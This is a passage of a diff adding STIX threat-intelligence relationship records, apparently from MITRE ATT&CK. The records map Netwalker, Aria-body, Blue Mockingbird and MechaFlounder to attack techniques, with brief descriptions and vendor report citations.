+ "source_ref": "malware--754effde-613c-4244-a83e-fb659b2a4d06",
+ "target_ref": "attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Netwalker May 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/",
+ "description": "Victor, K.. (2020, May 18). Netwalker Fileless Ransomware Injected via Reflective Loading . Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Netwalker](https://attack.mitre.org/software/S0457) can encrypt files on infected machines to extort victims.(Citation: TrendMicro Netwalker May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--b9a67332-54a8-4531-948f-51e3ae2a0399",
+ "type": "relationship",
+ "modified": "2020-06-08T16:07:36.321Z",
+ "created": "2020-05-26T21:02:38.815Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--754effde-613c-4244-a83e-fb659b2a4d06",
+ "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Netwalker May 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/",
+ "description": "Victor, K.. (2020, May 18). Netwalker Fileless Ransomware Injected via Reflective Loading . Retrieved May 26, 2020."
+ },
+ {
+ "source_name": "Sophos Netwalker May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/",
+ "description": "Szappanos, G., Brandt, A.. (2020, May 27). Netwalker ransomware tools give insight into threat actor. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Netwalker](https://attack.mitre.org/software/S0457) has been written in PowerShell and executed directly in memory, avoiding detection.(Citation: TrendMicro Netwalker May 2020)(Citation: Sophos Netwalker May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--998ad8ac-9929-4360-92c8-63efb1a81d78",
+ "type": "relationship",
+ "modified": "2020-06-08T16:07:36.347Z",
+ "created": "2020-05-26T21:02:38.816Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has the ability to identify the username on a compromised host.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--549c2737-1097-4a16-8d4b-01ad0e3e689f",
+ "type": "relationship",
+ "modified": "2020-05-27T13:22:06.702Z",
+ "created": "2020-05-27T13:22:06.702Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has used TCP in C2 communications.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--0997f41a-0232-4331-8a11-11a6433d8343",
+ "type": "relationship",
+ "modified": "2020-05-27T13:22:06.763Z",
+ "created": "2020-05-27T13:22:06.763Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has the ability to identify the location, public IP address, and domain name on a compromised host.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--3a24f6ef-80e2-48b9-8f00-36ca4f59f191",
+ "type": "relationship",
+ "modified": "2020-05-27T13:22:06.766Z",
+ "created": "2020-05-27T13:22:06.766Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has used HTTP in C2 communications.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--49badb38-7e44-4dd6-85b2-91bb281385a0",
+ "type": "relationship",
+ "modified": "2020-05-27T13:22:06.772Z",
+ "created": "2020-05-27T13:22:06.772Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has the ability to collect data from USB devices.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--2995ea85-ccdb-4378-bc35-3c62ccf5fa9d",
+ "type": "relationship",
+ "modified": "2020-06-03T13:40:15.351Z",
+ "created": "2020-05-27T13:22:06.779Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has the ability to use a reverse SOCKS proxy module.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--c7f1b492-eea7-45d1-ab78-6794c7560c67",
+ "type": "relationship",
+ "modified": "2020-07-03T21:52:44.922Z",
+ "created": "2020-05-27T13:22:06.775Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has the ability to identify the hostname, computer name, Windows version, processor speed, machine GUID, and disk information on a compromised host.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--5fdd0fba-8d1d-411a-b47b-3e5aae512892",
+ "type": "relationship",
+ "modified": "2020-06-03T13:40:15.348Z",
+ "created": "2020-05-27T13:22:06.780Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has the ability to duplicate a token from ntprint.exe.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--a5848e5c-0a64-44f2-9432-4d503baea628",
+ "type": "relationship",
+ "modified": "2020-06-03T20:11:27.728Z",
+ "created": "2020-05-27T13:35:36.629Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--677569f9-a8b0-459e-ab24-7f18091fa7bf",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has the ability to execute a process using runas.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--48e9217d-e93d-440f-9fa1-93116e5792bd",
+ "type": "relationship",
+ "modified": "2020-05-27T13:35:36.707Z",
+ "created": "2020-05-27T13:35:36.707Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has the ability to identify the titles of running windows on a compromised host.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--5ab058a1-4c88-481f-a7a8-77855ee916e6",
+ "type": "relationship",
+ "modified": "2020-05-27T13:35:36.714Z",
+ "created": "2020-05-27T13:35:36.714Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has used ZIP to compress data gathered on a compromised host.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--fa77baa1-a258-4059-aa84-6822fe023d70",
+ "type": "relationship",
+ "modified": "2020-06-03T13:40:15.323Z",
+ "created": "2020-05-27T13:35:36.729Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used Windows Scheduled Tasks to establish persistence on local and remote hosts.(Citation: RedCanary Mockingbird May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--3f221ccc-1be7-4959-b239-6a3e027da1ae",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.706Z",
+ "created": "2020-05-27T15:31:09.458Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used batch script files to automate execution and deployment of payloads.(Citation: RedCanary Mockingbird May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--552215a4-9761-4dce-8a59-83cd81ca43a8",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.803Z",
+ "created": "2020-05-27T15:31:09.471Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--910906dd-8c0a-475a-9cc1-5e029e2fad58",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used mofcomp.exe to establish WMI Event Subscription persistence mechanisms configured from a *.mof file.(Citation: RedCanary Mockingbird May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--1a666dc1-d0b9-49ac-b05b-350cfca7fa61",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.704Z",
+ "created": "2020-05-27T15:31:09.473Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used XMRIG to mine cryptocurrency on victim systems.(Citation: RedCanary Mockingbird May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--8042dc21-37e4-4a60-aef1-457179f346e5",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.709Z",
+ "created": "2020-05-27T15:31:09.486Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used frp, ssf, and Venom to establish SOCKS proxy connections.(Citation: RedCanary Mockingbird May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--4c26e6e8-8303-44ad-9e5d-452dff52858f",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.806Z",
+ "created": "2020-05-27T15:31:09.497Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used PowerShell reverse TCP shells to issue interactive commands over a network connection.(Citation: RedCanary Mockingbird May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--06de29d8-365b-4072-a4bb-9d436763ea1e",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.716Z",
+ "created": "2020-05-27T15:31:09.498Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used Windows Explorer to manually copy malicious files to remote hosts over SMB.(Citation: RedCanary Mockingbird May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--bf4d368e-202d-4bd2-9ffe-013ca6104e05",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.812Z",
+ "created": "2020-05-27T15:31:09.501Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used Remote Desktop to log on to servers interactively and manually copy files to remote hosts.(Citation: RedCanary Mockingbird May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--abd46534-2632-4c12-a9c2-06a2a4116f2c",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.933Z",
+ "created": "2020-05-27T15:31:09.530Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used Mimikatz to retrieve credentials from LSASS memory.(Citation: RedCanary Mockingbird May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--56af2eea-6c9d-4917-b7d9-275877cb552a",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.936Z",
+ "created": "2020-05-27T15:31:09.532Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--dcaa092b-7de9-4a21-977f-7fcb77e89c48",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used JuicyPotato to abuse the SeImpersonate token privilege to escalate from web application pool accounts to NT Authority\\SYSTEM.(Citation: RedCanary Mockingbird May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--6d3d48ff-ea37-4626-8148-4111163e95e3",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.926Z",
+ "created": "2020-05-27T15:31:09.535Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has masqueraded their XMRIG payload name by naming it wercplsupporte.dll after the legitimate wercplsupport.dll file.(Citation: RedCanary Mockingbird May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--cc42a6c0-ce7c-442b-8ccc-cb5a9fba3462",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.915Z",
+ "created": "2020-05-27T15:31:09.537Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has made their XMRIG payloads persistent as a Windows Service.(Citation: RedCanary Mockingbird May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--328e9746-4bb6-47e1-8e71-6418ca04c5fa",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.943Z",
+ "created": "2020-05-27T15:31:09.539Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has collected hardware details for the victim's system, including CPU and memory information.(Citation: RedCanary Mockingbird May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--1b9b84cc-f9c7-48c5-8e23-ac00a7a4691a",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.814Z",
+ "created": "2020-05-27T18:25:52.409Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "tool--afc079f3-c0ea-4096-b75d-3f05338b7f60",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "(Citation: RedCanary Mockingbird May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--47e9267e-e84d-43b6-992a-5f42d39c45bb",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.949Z",
+ "created": "2020-05-27T18:25:52.535Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--dfa03c7d-79ed-4ce2-b9d1-ddc9dbf56ad2",
+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
+ "external_references": [
+ {
+ "source_name": "Unit 42 MechaFlounder March 2019",
+ "url": "https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/",
+ "description": "Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to identify the username and hostname on a compromised host.(Citation: Unit 42 MechaFlounder March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--3ef224b5-2edf-41c1-916f-1d80a7dc4ada",
+ "type": "relationship",
+ "modified": "2020-05-27T20:25:33.633Z",
+ "created": "2020-05-27T20:25:33.633Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--dfa03c7d-79ed-4ce2-b9d1-ddc9dbf56ad2",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "Unit 42 MechaFlounder March 2019",
+ "url": "https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/",
